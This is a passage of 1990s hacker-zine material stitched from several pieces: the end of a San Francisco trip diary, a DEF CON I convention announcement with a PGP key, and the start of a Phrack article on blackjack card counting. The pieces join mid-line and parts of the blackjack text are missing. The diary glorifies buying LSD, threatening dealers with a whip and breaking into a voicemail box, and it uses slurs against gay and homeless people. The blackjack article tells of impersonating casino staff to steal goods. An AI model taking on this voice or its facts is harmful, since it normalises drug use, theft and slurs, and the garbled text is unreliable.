my hands. Fitz also got a whip and five stars. We were now armed...Phiber
beware.
We took off down to the port to look out at the bay. While we were there
we watched a bunch of skaters doing totally insane street style in a small
cement fountain area. One kid waxed the street with his face and we all
had a serious laugh, much to the chagrin of the injured and his posse.
As soon as they scraped up the hapless skatepunk off the ground,
they resumed their thrashing, avoiding the wet spot. We decided
that these kids were totally insane.
We took off back to the hotel to meet up with the idiots. Once we arrived
we found that we were locked out of our room. In fact, not only had they
cut off our keys, but they had checked us out. We got a security guard
to let us in the room. Shortly thereafter X-con et.al. returned loaded
with gear they had picked up on their trip. They exclaimed that they
rushed back to the hotel at top speed, since when they tried to call the
room, the hotel had said that our room was not in use.
I got furious and went downstairs to yell. Eventually, we got our phone
service back and the manager went upstairs to give us a live body to
verbally abuse, which we took full advantage of. He shucked and jived
his way through an apology but we did not get a free night as we had
hoped for.
14. Castro-Bound
X-Con wanted shoes. We all sorted out the card key mess and piled back in
The Pilot's car and headed out to find NaNa's. As we drove towards
the store we noticed something change about the city. The fog lifted.
The colors got more pastel. The men walking down the street seemed to
have more spring in their step. We had entered the Castro.
I really wanted to hit a record store in the Castro because homos always
seem to have cool dance music. I convinced everyone that we should pull
over and risk a quick walk down the main drag.
None of the record stores had anything good. There were lots of old
Judy Garland and Ethyl Merman but nothing more modern than the
Village People. (And I was expecting techno. But noooooo...)
On our way back to the car we passed by a leather goods store. Not
exactly Tandycraft, if you get my drift. X-con was the only one
brave enough to go in. He came out looking drained of all color holding
a catalog.
"There were these three guys in there," he stammered. "One of them was
being fitted for a cock sheath. The two other guys kept showing him
different ones, but he said they were too big."
We drove a few miles more down the street and ended up at the NaNa's shop.
The store was your typical alternative grunge-wear shop. Stompin'
boots, nifty caps, shirts by Blunt. X-con got his shoes. We all got
nifty caps. Leaving for the hotel, I grabbed a handful of flyers from
the front window. Most were rave flyers for the next weekend. One however
was announcing a bondage party for 'women only' two days later. I felt a
tear begin to form as I reminisced about the Bridge.
We regrouped back at the hotel and took off again for the Height to go
check out Rough Trade records and see what could be seen. And X-con
and I needed a few tabs. (YEEE!) We needed these rather badly since
Mr. Blast had found out about a rave that evening from the SF-RAVES
mailing list. There was no way X-con and I could sit through a rave
sober, and dancing was WAY out of the question.
Ethopian food was odd. Looking over the menu, Mr. Blast decided that
he didn't want much of anything they had to offer. We decided that we
should buy a lot of everything and just pick and choose. I made the
comment that I would only eat chicken, and Mr. Blast didn't like the
idea of eating much of anything everyone wanted to try. We ordered
separately.
The food came out in a rather odd fashion. Everything was piled on top
of everything else. It was all splattered on top of a weird pancake-like
sponge bread. There were all manner of sauces to smother, dip, or otherwise
destroy the entrees with, so we all took great bravado in our sampling of
each. It was quite a fantastic spread, and I wholeheartedly urge everyone
to check out this particular cuisine.
After the meal we took off to find a phone to call the raveline. On our
way to the phone X-con and I stumbled across a few transients who offered
us acid at a remarkable price. This was almost too good to be true.
We slunk down a side street and bs'ed with the homeless couple as we
decided how many to buy. We settled on 20 hits for 45 dollars. X-con
and I were psyched. The rave would indeed be tolerable.
We hooked up with the crew, smiling like Cheshire cats. Mr. Blast had
the directions to the rave so we took off ready to overindulge.
By the time we reached the rave, we were one of what seemed like
a hundred or two hanging outside of a warehouse. This might be
pretty damn cool. X-con and I began our dosing.
Now, usually I love the first contact of the blotter with my tongue.
It evokes a certain tangy taste, akin to touching a battery to the tip
of your tongue. It always gets the adrenaline flowing, and brings
back memories of what will soon be repeated.
Nothing.
Now X-con and I were really pissed. I whipped out my steel whip and said,
"Let's go pay a quick visit to the Height and visit our friends."
We piled back into the cars and set out to do some serious damage.
Arriving in the Height we noticed that cops were everywhere. This was not
going to be easy. X-con and I set out like men possessed. The transients
were gone. We wandered up and down the street for about 30 minutes looking
for our prey. Finally we saw them. They saw us. One ran like a marathon
sprinter. The other stayed, but was soon flanked by a gang of eight
other transients. X-con walked right up and said "You fucking ripped us
off!"
As we tried to get either our money back or working drugs, more and more
transients gathered. It was time to write it off as a loss. We cursed
and backed away from the crowd.
Our group had congregated at a grocery store at the end of the street.
Mr. Blast was speed dialing the raveline in a desperate attempt to
find a venue to spin wildly in and blow his day-glo rave whistle.
Across the street, a homeless black man screamed painfully at each and
every passing car, "HELP! You gotta take me and my girlfriend to
the hospital now! She's gonna DIE!" He staggered over to us
and begged for a ride, we respectfully declined.
As this was going on, the grocery store erupted with violence as
a drunken frat type was ejected forcibly. He started swinging
wildly at the rent-a-cop, and was greeted with the business end
of a police baton.
The Pilot decided this was a good time to make his exit. He waved
goodbye and was gone.
We no longer had room for everyone, so Voxman & the nameless waif were
offered a ride from a flaming pedophile who overheard their plight.
The took him up on his offer before we could stop them. We said a quick
prayer for them and piled into the car.
The new location was out at a marina in Berkeley on the beach. It took damn
near an enternity to get there and when we arrived it was raining.
X-con and I made it our mission to find acid at this location. The music
could be heard for several hundred yards from the street, so we took off
in a sprint towards the source.
Our saviour was in the form of a teenage Hispanic dude. He had red blotter
with elephant, and yellow blotter with some other kind of design. The
yellow was "three-way." We bought several of each, and there was much
rejoicing. X-con had already eaten one three-way and one regular, before
I could split one in half for RBOC. The taste was overwhelming.
Freshly squeezed.
The three of us perched up on a hill staring out over the undulating mass
waiting for the effect. It came quickly.
From a nearby hotel lobby, Fitz and X-con busily hacked at the VMB
while RBOC and I sat in the car totally wigging. About 30 minutes
later they ran out screaming. It had been done and the code was
now 902100.
We drove back to the rave and noticed the red and blues flashing and the
ravers bailing en masse. We picked up Mr. Blast and Fender and took off
back to our hotel. Fender had done a bit of networking at the rave and
exchanged a few business cards. We were totally appalled.
Once back at the hotel X-con took even more. He said he wanted to see
static. Within an hour he achieved his goal. He spent a large portion of
the night walking in and out of the room muttering, "Man...you guys are
totally fucking with me."
The call never came in. The hotel had turned off our phone for incoming
calls. This sparked even more fun, as RBOC called up the front desk
to complain, "Look ma'am, my hookers can't fucking call into my room!
Turn my phone back on NOW! I've had a rough night up for 24 hours on
drugs, and I need a woman." The operator was not amused.
The sun rose. We all remarked about the typical morning after layer of
filth that seems to congeal after a good fry. The static was no longer
visible to X-con and he became almost lucid again, interjecting bits
of wisdom like "Uh" and "Yeah" into the conversation. His flight was in
two hours.
The linguini arrived and everyone had a small taste as the smell of
the white sauce permeated the room. As we smacked away, the inexperienced
of the crowd arose to greet a new morning. RBOC suddenly realized that
NYC was probably snowed under, so he took off to find a phone to check
on the status of his flight home.
X-con gathered his bags and mumbled "Later," and disappeared. I fell on the
bed and disappeared into darkness.
17. Laterz
The alarm clock blared out a sickening beep, to which it was rewarded with
a small flight across the hotel room. I gathered up my gear and made a
beeline towards the elevator.
***************************************************************************
D E F C O N I C O N V E N T I O N
D E F C O N I C O N V E N T I O N
DEF CON I CONVENTION
D E F C O N I C O N V E N T I O N
>> READ AND DISTRIBUTE AND READ AND DISTRIBUTE AND READ AND DISTRIBUTE <<
Finalized Announcement: 5/08/1993
If you are at all familiar with any of the previous Con's, then you
will have a good idea of what DEF CON I will be like. If you don't have any
experience with Con's, they are an event on the order of a pilgrimage to
Mecca for the underground. They are a mind-blowing orgy of information
exchange, viewpoints, speeches, education, enlightenment... And most of all
sheer, unchecked PARTYING. It is an event that you must experience at least
once in your lifetime.
Las Vegas, is as you might have guessed a great choice for the Con.
Gambling, loads of hotels and facilities, cheap air fare and room rates.
It's also in the West Coast making it more available to a different crowd
than the former Cons have been.
Your foray into the scene and your life will be forever incomplete
if by some chance you miss out on DEF CON I. Plan to be there!
DESCRIPTION:
So your bored, and have never gone to a convention? You want to meet
all the other members of the so called 'computer underground'? You've been
calling BBS systems for a long time now, and you definitely have been
interacting on the national networks. You've bullshitted with the best,
and now it's time to meet them in Vegas! For me I've been networking for
years, and now I'll get a chance to meet everyone in the flesh. Get
together with a group of your friends and make the journey.
DEF CON I will be over the weekend in the middle of down town Las
Vegas at the Sands Hotel. Why Las Vegas? Well the West Coast hasn't had
a good Convention that I can remember, and Las Vegas is the place to do it.
Cheap food, alcohol, lots of entertainment and, like us, it never sleeps.
We will have a convention room open 24 hours so everyone can meet and plan
and scheme till they pass out. Events and speakers will be there to provide
distraction and some actual information and experiences from this loosely
knit community.
This is an initial announcement. It is meant only to alert you to
the time, dates and location of the convention. Future announcements will
inform you about specific speakers and events.
FINAL NOTES:
COST: How you get there is up to you, but United Airlines will be
the official carrier (meaning if you fly you get a 5% to 10% price reduction
off the cheapest available fare at the time of ticket purchase) When buying
airline tickets, call 1-800-521-4041 and reference meeting ID# 540ii. Hotel
Rooms will cost $62 per night for a double occupancy room. Get your friends
together and split the cost to $31. Food is inexpensive. The entertainment
is free inside the hotel. Reference the DEF CON I convention when
registering, as we have a block of rooms locked out, but once they go it will
be first come, fist serve. Call 1-800-634-6901 for the reservations desk.
The convention itself will cost $30 at the door, or $15 in advance.
It pays to register in advance! Also it helps us plan and cover expenses!
Mail checks/money orders/cashiers checks to: DEF CON I, 2709 East Madison
Street, #102, Seattle, WA, 98112. Make them payable to: "DEF CON" we're not
trying to make money, we will be trying to cover costs of the conference room
and hotel plus air fair for the speakers who require it. Don't bother mailing
it a week in advance, that just won't happen. Advanced registration gets you
a groovy 24 bit color pre-generated name tag. Include with your payment the
name you want listed, your association/group affiliation/bbs/whatever, email
address, and/or bbs number for syops. Last day for the registrations to reach
me will be July 1st.
------------------------------------------------------------------------------
Updates since the last announcement:
Don't forget to bring a poster / banner representing any of the groups you
belong to. I want to cover the conference room walls with a display of all
the various groups / people attending. (Break out the crayons and markers)
------------------------------------------------------------------------------
Civil Libertarians
-CPSR Computer Privacy/1st Amendment/Encryption
Gender Rolls and Discrimination
*Judi Clark
'The Underworld'
-Networking Concerns of National Networking
of CCi (Cyber Crime International) Network.
*Midnight Sorrow.
Corporations
-Packet Switching
SPRINT Concerns/security and the future
MCI of packet switching.
(*Jim Black, MCI Systems Integrity)
The 'Underworld'
-Internet The security problems with Internet/Networks
Overview of hacking
*Dark Druid
[email protected]
Voice Mail 0-700-TANGENT
------------------------------------------------------------------------------
[> DEF CON I and United Airlines Travel Arrangements <]
United Airlines has been chosen as the official carrier for DEF CON I
and is pleased to offer a 10% discount off the unrestricted BUA coach fare or
a 5% discount off the lowest applicable fares, including first class. This
special offer is available only to attendees of this meeting, and applies to
travel on domestic segments of all United Airlines and United Express flights.
A 5% discount off any fare is also available for attendees traveling to or from
Canada in conjunction with your meeting. These fares are available through
United's Meeting Desk with all fare rules and restrictions applying.
-----
--
Sorry for the huge signature, but I like privacy on sensitive matters.
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.2
mQCNAiviMB8AAAEEANO4XmnggG8h8XWtfxShMvRUarlpj2OBSPMrzUNRAKEjupUj
f/FfszMk0G60GSiCfiosw/m2JcKPQ6OZgQCxfElFUcYkKx/rYjgU3viEmNasjAwN
jR/9l0WSXlv4CjCUtH/t4rm1C1bs8i6iznmu/dCeuUEZQoRm0Lrdt/10TGt3AAUT
tCtUaGUgRGFyayBUYW5nZW50IDxkdGFuZ2VudEBkdGFuZ2VudC53YS5jb20+
=DxKN
-----END PGP PUBLIC KEY BLOCK-----# ==Phrack
Magazine==
Part 1 of 2 (50K)
BLURB:
"I learned a lot of things I didn't know from Lex's File" ---Bruce Sterling
Introduction:
-------------
Regardless of whether you go to this DEF CON 1 thing, if you ever plan to
hit a casino with the purpose of MAKING MONEY, then you really should
concentrate on ONE game of chance: BlackJack. Why? Because BlackJack is the
*ONLY* casino game that affords the educated and skilled player a long-term
mathematical advantage over the house. All the other casino games: Craps,
Roulette, Slots, etc. have the long-term mathematical advantage over the
player (see table below). BlackJack is also the only casino game for which the
odds are always changing. Don't be fooled by all the glitter, a casino is a
business and must make a profit to survive. The profit is ensured by using a
set of rules which provides them with an edge. Now you say: wait a sec, how do
they make money if BlackJack can be beaten? There are a couple of reasons. One
reason is that there are very few good players who make it their profession to
beat casinos at BlackJack day in and day out. There are many more who THINK
they are good, THINK they know how to play the game, and lose more money than
the really good players win. Notwithstanding the throngs of vacationers who
admit to not being well versed in the game and consequently are doomed to
lose...plenty. Another reason is that if a casino thinks you are a "counter"
(a term just as nasty as "phreaker" to the phone company) there is a good
chance that they will ask you to leave. See the section on Social Engineering
the Casino to avoid being spotted as a counter. Also, the house secures its
advantage in BlackJack from the fact that the player has to act first. If you
bust, the dealer wins your bet regardless of whether the dealer busts later.
The following table illustrates my point regarding house advantages for the
various casino games and BlackJack strategies. The data is available in most
books on casino gambling. Note that negative percentages denote player
disadvantages and are therefore house advantages.
--------------------------------------------------------------------------
GAME Your Advantage (over the long run)
--------------------------------------------------------------------------
Craps -1.4 % overall average
Baccarat -1.1 % to -5.0 %
Roulette -2.7 % to -5.26 %
Slots -2.5 to -25 % depending on machine setting
Keno -25 % more or less
Notes:
b) It's hard to win at something you don't understand. If you want to win
consistently at anything, learn every thing you can about it. BlackJack is no
exception.
History of BlackJack:
---------------------
First, a brief history of cards: Playing cards are believed to have been
invented in China and/or India sometime around 900 A.D. The Chinese are
thought to have originated card games when they began shuffling paper money
(another Chinese invention) into various combinations. In China today, the
general term for playing cards means "paper tickets". The contemporary 52 card
deck used in the U.S. was originally referred to as the "French Pack" (circa
1600's) which was later adopted by the English and subsequently the Americans.
The first accounts of gambling were in 2300 B.C. or so, and yes, the
Chinese again get the credit. Gambling was very popular in Ancient Greece even
though it was illegal and has been a part of the human experience ever since.
Today, with the all too common manipulation of language to suit one's own
purposes, gambling is no longer a term used by casinos....they prefer to use
the word GAMING instead. Just as Post Traumatic Stress Disorder has replaced
the term Shell Shock in military jargon. Since this manipulation of language
is all the rage these days, why don't we water down the name Computer Hacker
and replace it with Misguided Information Junky or someone who is afflicted
with a Compulsive Curiosity Disorder?
The history of the BlackJack card game itself is still disputed but was
probably spawned from other French games such as "chemin de fer and French
Ferme", both of which I am completely unfamiliar with. BlackJack originated in
French Casino's around 1700 where it was called "vingt-et-un" ("twenty-and-
one" in French) and has been played in the U.S. since the 1800's. BlackJack is
called Black-Jack because if a player got a Jack of Spades and an Ace of
Spades as the first two cards (Spade being the color black of course), the
player was additionally remunerated.
Gambling was legal out West from the 1850's to 1910 at which time Nevada
made it a felony to operate a gambling game. In 1931, Nevada re-legalized
casino gambling where BlackJack became one of the primary games of chance
offered to gamblers. As some of you may recall, 1978 was the year casino
gambling was legalized in Atlantic City, New Jersey. As of 1989, only two
states had legalized casino gambling. Since then, about 20 states have a
number of small time casinos (compared to Vegas) which have sprouted up in
places such as Black Hawk and Cripple Creek Colorado and in river boats on the
Mississippi. Also as of this writing, roughly 70 Native American Indian
reservations operate or are building casinos, some of which are in New York
and Connecticut. In addition to the U.S., some of the countries (there are
many) operating casinos are: France, England, Monaco (Monte Carlo of course)
and quite a few in the Caribbean islands (Puerto Rico, Bahamas, Aruba, etc.).
To continue with the analogy, one can consider Professor Edward O. Thorp to
be the Captain Crunch of BlackJack. Dr. Thorp, then a mathematics teacher,
picked up where Baldwin and company left off. In 1962, Thorp refined their
basic strategy and developed the first card counting techniques. He published
his results in "Beat the Dealer" [3], a book that became so popular that for a
week in 1963 it was on the New York Time's best seller list. The book also
scared the hell out of the Casino's. Thorp wrote "Beat the Market" in 1967, in
which he used mathematics and computer algorithms to find pricing
inefficiencies between stocks and related securities. Currently he is using an
arbitrage formula to exploit undervalued warrants in the Japanese stock
market.
The Casinos were so scared after Beat the Dealer, that they even changed
the rules of the game to make if more difficult for the players to win. This
didn't last long as people protested by not playing the new pseudo-BlackJack.
The unfavorable rules resulted in a loss of income for the casinos. Not making
money is a sin for a casino, so they quickly reverted back to the original
rules. Because Thorp's "Ten-Count" method wasn't easy to master and many
people didn't really understand it anyway, the casinos made a bundle from the
game's newly gained popularity thanks to Thorp's book and all the media
attention it generated.
Beat the Dealer is rather difficult to find these days, I picked up a copy
at the library recently and checked the card in the back to see how popular
it is today. I was surprised as hell to find that it was checked out over 20
times in the past year and a half or so! How many books from 1962 can claim
that? I do not recommend reading the book for anything other than posterity
purposes though, the reason being that newer books contain better, and easier
to learn strategies.
Lastly, let me mention Ken Uston, who used five computers that were built
into the shoes of members of his playing team in 1977. They won over a hundred
thousand dollars in a very short time but one of the computers was
confiscated and sent to the FBI. The fedz decided that the computer used
public information on BlackJack playing and was not a cheating device. You may
have seen this story in a movie made about his BlackJack exploits detailed in
his book "The Big Player". Ken was also featured on a 1981 Sixty Minutes show
and helped lead a successful legal challenge to prevent Atlantic City casinos
from barring card counters.
Useful Definitions:
-------------------
Action: This is a general gambling term which refers to the total amount of
money bet in a specific period of time. Ten bets of ten dollars each
is $100 of action.
Burn Card: A single card taken from the top of the deck or the first card in
a shoe which the dealer slides across the table from his/her left
to the right, and is placed into the discard tray. The card may or
may not be shown face up (which can affect the count if you are
counting cards). A card is burned after each shuffle. I have
not been able to find out how this started nor the purpose for
burning a card. If you know, drop me some email.
Cut Card: A solid colored card typically a piece of plastic which is given to
a player by the dealer for the purpose of cutting the deck(s) after
a shuffle. Cutting the cards in the 'right' location is part of
the 'shuffle tracking' strategy mentioned later in Part 2.
Hole Card: Any face down card. The definition most often refers to the
dealer's single face down card however.
Shoe: A device that can hold up to eight decks of cards which allows the
dealer to slide out the cards one at a time.
Hard Hand: A hand in which any Ace is counted as a 1 and not as an 11.
Pair: When a player's first two cards are numerically identical (ie, 7,7).
Point Count: The net value of the card count at the end of a hand.
Running Count: The count from the beginning of the deck or shoe. The running
count is updated by the value of the point count after each
hand.
True Count: The running count adjusted to account for the number of cards left
in the deck or shoe to be played.
Flat Bet: A bet which you do not vary ie, if you are flat betting ten dollars,
you are betting $10 each and every hand without changing the betting
amount from one hand to the next.
Foreign Chip: A chip that is issued by one casino and is honored by another
as cash. A casino is not necessarily obligated to accept them.
Settlement: The resolving of the bet. Either the dealer takes your chips,
pays you, or in the case of a push, no exchange of chips occurs.
Toke: Its not what some of you may think...to "toke" the dealer is just
another word for tipping the dealer.
Heat: The pressure a casino puts on a winning player, typically someone who
is suspected of being a card counter.
Shuffle Up: Prematurely shuffling the cards to harass a player who is usually
suspected of being a counter.
Pit: The area inside a group of gaming tables. The tables are arranged in
an elliptical manner, the space inside the perimeter is the pit.
Cage: Short for cashier's cage. This is where chips are redeemed for cash,
checks cashed, credit arranged, etc.
Drop Percentage: That portion of the player's money that the casino will win
because of the house percentage. It is a measure of the
amount of a player's initial stake that he or she will
eventually lose. On average this number is around 20 percent.
That is, on average, Joe Gambler will lose $20 of every $100
he begins with.
Tough Player: What the casino labels an '3L33T' player who can hurt the casino
monetarily with his or her intelligent play.
Shill: A house employee who bets money and pretends to be a player to attract
customers. Shills typically follow the same rules as the dealer which
makes them somewhat easy to spot (ie, they don't Double Down or Split).
The rules of BlackJack differ slightly from area to area and/or from casino
to casino. For example, a casino in downtown Vegas may have different rules
than one of the Vegas Strip casinos which may have different rules from a
casino up in Reno or Tahoe (Nevada). The rules in a casino in Freeport Bahamas
may differ from those in Atlantic City, etc. Therefore, it is important to
research, a priori, what the rules are for the area/casino(s) you plan on
playing in. For Nevada casinos you can order a copy of [1] which contains
rules info on all the licensed casinos in the state. Later in this article,
you will see that each set of rule variations has a corresponding Basic
Strategy chart that must be memorized. Memorizing all the charts can be too
confusing and is not recommended.
The BlackJack table seats a dealer and one to seven players. The first seat
on the dealer's left is referred to as First Base, the first seat on the
dealer's right is referred to as Third Base. A betting square is printed on
the felt table in front of each player seat. Immediately in front of the
dealer is the chip tray. On the dealer's left is the deck or shoe and beside
that should be the minimum bet sign--something that you ought to read before
sitting down to play. On the dealer's immediate right is the money drop slot
where all currency and tips (chips) are deposited. Next to the drop slot is
the discard tray. Play begins after the following ritual is completed: the
dealer shuffles the cards, the deck(s) is "cut" by a player using the marker
card, and the dealer "burns" a card.
Before any cards are dealt, the players may make a wager by placing the
desired chips (value and number) into the betting box. I used the word "may"
because you are not forced to bet every hand. Occasionally a player may sit
out a hand or two for various reasons. I have sat out a couple of hands at
times when the dealer was getting extremely lucky and everyone was losing. If
you attempt to sit out too many hands especially if there are people waiting
to play at your table, you may be asked to leave the table until you are ready
to play. If you don't have any chips, put some cash on the table and the
dealer will exchange them for chips.
Once all the bets are down, two cards (one at a time) are dealt from left
to right. In many Vegas casinos, players get both cards face down. In Atlantic
City and most every where else the player's cards are dealt face up. Should
the cards be dealt face up, don't make the faux pas of touching them! They are
dealt face up for a reason, primarily to prevent a few types of player
cheating (see section on cheating in Part 2) and the dealer will sternly but
nicely tell you not to touch the cards. As most of you know the dealer receives
one card down and one card up. The numerical values of the cards are:
(10, J, Q, K) = 10 ; (Ace) = 1 or 11 ; (other cards) = face value (3 = 3).
Since a casino can be as noisy as an old Step-by-Step Switch with all those
slot machines going, marbles jumping around on roulette wheels, demoniacal
shrieks of "YO-LEVEN" at the craps table, people screaming that they hit the
big one and so on, hand signals are usually the preferred method of signalling
hit, stand, etc.
If the cards were dealt face down and you want a hit, lightly flick the
cards across the felt two times. If the cards were dealt face up, point at the
cards with a quick stabbing motion. You may also want to nod your head yes
while saying "hit". The best way to indicate to the dealer that you want to
stand regardless of how the cards were dealt is to move your hand from left
to right in a level attitude with your palm down. Your hand should be a few
inches or so above the table. Nodding your head no at the same time helps,
while saying "stay" or "stand".
Dealer Rules - The rules the dealer must play by are very simple. If the
dealer's hand is 16 or less, he/she must take a card. If the dealer's hand is
17 or more, he/she must stand. Note that some casinos allow the dealer to hit
on soft 17 which gives the house a very small additional advantage. The
dealer's strategy is fixed and what you and the other players have is
immaterial to him/her as far as hitting and standing is concerned.
Player rules - The player can do whatever he/she wants as far as hitting and
standing goes with the exception of the following special circumstances. See
the section on Basic Strategy for the appropriate times to hit, stand, split,
and double down. The aim is to have a hand which is higher than the dealers'.
If there is a tie (push), neither you nor the dealer wins. Should a player get
a BlackJack (first 2 cards are an Ace and a ten) the payoff is 150% more than
the original bet ie, bet $10.00 and the payoff is $15.00.
SPLITTING PAIRS: If you have a pair that you want to split and your cards are
dealt face down, turn them over and place them a few inches apart. If your
cards were dealt face up, point to your cards and say "split" when the dealer
prompts you for a card. The original bet will go with one card and you will
have to place an equal amount of chips in the betting box near the other card.
You are now playing two hands, each as though they were regular hands with the
exception being that if you have just split two aces. In that case, you only
get one card which will hopefully be a 10. If it is a ten, that hand's total
is now 21 but the hand isn't considered a BlackJack. That is, you are paid 1:1
and not 1:1.5 as for a natural (BlackJack).
Combined example of above two plays: Say you are dealt two fives. You split
them (you dummy!). The next card is another 5 and you re-split them (you
chucklehead!!). Three hands have grown out of one AND you are now in for
three times your original bet. But wait. Say the next card is a six. So one
hand is a 5,6 which gives you eleven; another just has a 5 and the other hand
has a 5. You decide to double down on the first hand. You are dealt a 7 giving
18 which you stand on. Now a ten is dealt for the second hand and you decide
to stay at 15. The last hand is the lonely third 5, which is dealt a four for
a total of nine. You decide to double down and get an eight giving that hand a
total of 17. Shit you say, you started with a twenty dollar bet and now you
are in for a hundred! Better hope the dealer doesn't end up with a hand more
than 18 lest you lose a C-note. The moral of this example is to not get caught
up in the excitement and make rash decisions. However, there have been a
couple of times where Basic Strategy dictated that certain split and double
down plays should be made and I was very low on chips (and cash). Unless you
are *really* psychic, don't go against Basic Strategy! I didn't and usually
came out the better for it although I was really sweating the outcome of the
hand due to my low cash status. The reason it was stupid to split two fives is
that you are replacing a hand that is great for drawing on or doubling down
on, by what will probably be two shitty hands.
INSURANCE: This option comes into play when the dealer's up card is an Ace. At
this point all the players have two cards. The dealer does not check his/her
hole card before asking the players if they want insurance. The reason being
evident as the dealer can't give away the value of the hole card if the dealer
doesn't know what the hole card is. If a player wants insurance, half the
original amount bet is placed on the semicircle labeled "insurance" which is
printed on the table. If the dealer has a BlackJack the player wins the side
bet (the insurance bet) but loses the original bet, thus providing no net loss
or gain since insurance pays 2 to 1. If the dealer does not have a BlackJack,
the side bet is lost and the hand is played normally. If you are not counting
cards DO NOT TAKE INSURANCE! The proper Basic Strategy play is to decline. The
time to take insurance is when the number of non-tens to tens drops below a
2 to 1 margin since insurance pays 2 to 1. It's simple math check it yourself.
"In a single-deck game, you would surrender only the above hands
marked with an asterisk, as well as 7,7 against a dealer's 10
up-card." [5]
Casino variations - Note that some casinos do not permit doubling down on
split pairs, and/or re-splitting pairs. These options provide the player with
a slight additional advantage.
Let me begin this section with the following statement: SCARED MONEY RARELY
WINS. Most gambling books devote quite a bit of time to the psychology of
gambling and rightfully so. There is a fine line to responsible gambling. On
one hand you shouldn't bet money that you cannot afford to lose. On the other
hand, if you are betting with money you expect to lose, where is your
confidence? When I used to gamble, it was small time. I define small time as
bringing $250.00 of 'losable' money. I've lost that much in one night. I
didn't like it, but I still ate that week. One pitfall you can easily fall
into happens AFTER you lose. You scold yourself for losing money you could
have done something productive with. "DAMN, I could have bought a 200 MB hard
drive with that!#&!". You should think about these things BEFORE you play.
Scared money is more in the mind than real. What I mean by that is even if
you gamble with your last $10.00 in the world, it is important to play as
though you have thousands of dollars in front of you. I don't mean piss the
ten bucks away. I mean that there are certain plays you should make according
to your chosen strategy which are the optimum mathematically. Don't make
changes to it out of fear. Fear is not your friend.
The "risk of ruin" is the percent chance that you will lose your entire
bankroll. This percentage should not exceed 5% if you plan on playing multiple
sessions to make money. The risk of ruin is dependent on the sizes of your
bets during a session. The "Kelly Criterion" provides a zero percent risk of
ruin. The system requires that you bet according to the percent advantage you
have at any one time. For example, if you are counting cards and your
advantage for a certain hand is 2% then you may bet 2% of your total bankroll.
If your total is $1000. then you can bet $20. Note that if you won the hand
your bankroll is now $1020 and if your advantage dropped to 1.5%, taking .015
times 1020 (which will determine your next bet size) in your head isn't all
that easy. The literature provides more reasonable systems, but do yourself a
favor and stay away from "betting progressions". See Reference [16] (available
on the Internet) for more information regarding risk of ruin & optimal wagers.
If you are gambling to make money, it is important to define how much cash
you can lose before quitting. This number is called the "stop-loss limit". My
stop-loss limit was my entire session bankroll which was $250 (50 betting
units of $5.00 or 25 betting units of $10.00). This concept is especially
important if you expect to play in the casinos for more than one session. Most
books recommend that your session bankroll be about a fifth of your trip
bankroll. Unfortunately, most people who have $500 in their wallet with a self
imposed stop-loss limit is $200 will violate that limit should they lose the
two hundred. Discipline is what separates the great players from the ordinary
ones.
Obviously you don't want to put a limit on how much you want to win.
However, if you are keeping with a structured system there are certain limits
to what your minimum and maximum bets should be. I am not going to go into
that here though.
| * <-+
| * * | Loss
^ | * * | Limit
| | * * <----QUIT! <-+
| | *
W | *
i | *
n | *
n | *
i | *
n | *
g | *
|
|_________________________________________
Time ---------------->
Determine your loss limit and stay with it. Obviously the loss limit will
change as you keep winning. Standard loss limits are 10 to 20 percent of the
current bankroll. Note that this philosophy is also used in stock market
speculation.
Basic Strategy:
---------------
If you only read one section of this file, and you don't already know what
Basic Strategy is, then this is the section you should read. Knowing Basic
Strategy is CRITICAL to you gaining an advantage over the house. The Basic
Strategy for a particular set of rules was developed by intensive computer
simulation which performed a complete combinatorial analysis. The computer
"played" tens of thousands of hands for each BlackJack situation possible and
statistically decided as to which play decision favored the player. The
following 3 charts should be duplicated or cut out from a hardcopy of this
file. You don't want to wave them around at a BlackJack table but its nice to
have them on hand in case you fail to recall some plays, at which time you can
run to the rest room to refresh your memory.
I hope you don't think this is weird but I keep a copy of a certain Basic
Strategy chart in my wallet at ALL times...just in case. Just in case of what
you ask? Permit me to go off on a slight(?) tangent. The following story really
happened. In 1984 I was visiting LOD BBS co-sysop, Paul Muad'dib up in New York
City. After about a week we were very low on cash despite the Pay Phone
windfall mentioned in my Phrack Pro-Phile ;->. I contacted a friend of mine
who was working in New Jersey and he offered us a job for a couple of days. I
spent just about the last of my cash on bus fair for me and Paul figuring that
I would be getting more money soon. Some how, the destination was
miscommunicated and we ended up in Atlantic City, which was not the location of
the job. We were stuck. Our only recourse was to attempt to win some money to
get us back on track. First we needed a little more capital. Paul, being known
to physically impersonate phone company workers, and a Department of Motor
Vehicles computer technician among others, decided to impersonate a casino
employee so he could "look around". Look around he did, found a storage closet
with a portable cooler and a case of warm soda, not exactly a gold mine but
hey. He proceeded to walk that stuff right out of the casino. We commandeered
some ice and walked around the beach for an hour selling sodas. It wasn't all
that bad as scantily clad women seemed to be the ones buying them. To cut the
story short, Paul knew ESS but he didn't know BlackJack. He lost and we
resorted to calling up Sharp Razor, a fellow Legion member residing in NJ, who
gave us (or is it lent?) the cash to continue our journey. For the record, I
was fairly clueless about BlackJack at the time which really means that I
thought I knew how to play but really didn't because I didn't even know Basic
Strategy. The same goes for Paul. Had we had a chart on hand, we would at least
have made the correct plays.
Dealer's Up-Card
Your +---+---+---+---+---+---+---+---+----+---+
Hand | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | A |
+-----+---+---+---+---+---+---+---+---+----+---+
| 8 | H | H | H | D | D | H | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| 9 | D | D | D | D | D | H | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| 10 | D | D | D | D | D | D | D | D | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| 11 | D | D | D | D | D | D | D | D | D | D |
+-----+---+---+---+---+---+---+---+---+----+---+
| 12 | H | H | S | S | S | H | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| 13 | S | S | S | S | S | H | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| 14 | S | S | S | S | S | H | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| 15 | S | S | S | S | S | H | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| 16 | S | S | S | S | S | H | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| 17 | S | S | S | S | S | S | S | S | S | S |
+-----+---+---+---+---+---+---+---+---+----+---+
| A,2 | H | H | D | D | D | H | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| A,3 | H | H | D | D | D | H | H | H | H | H |
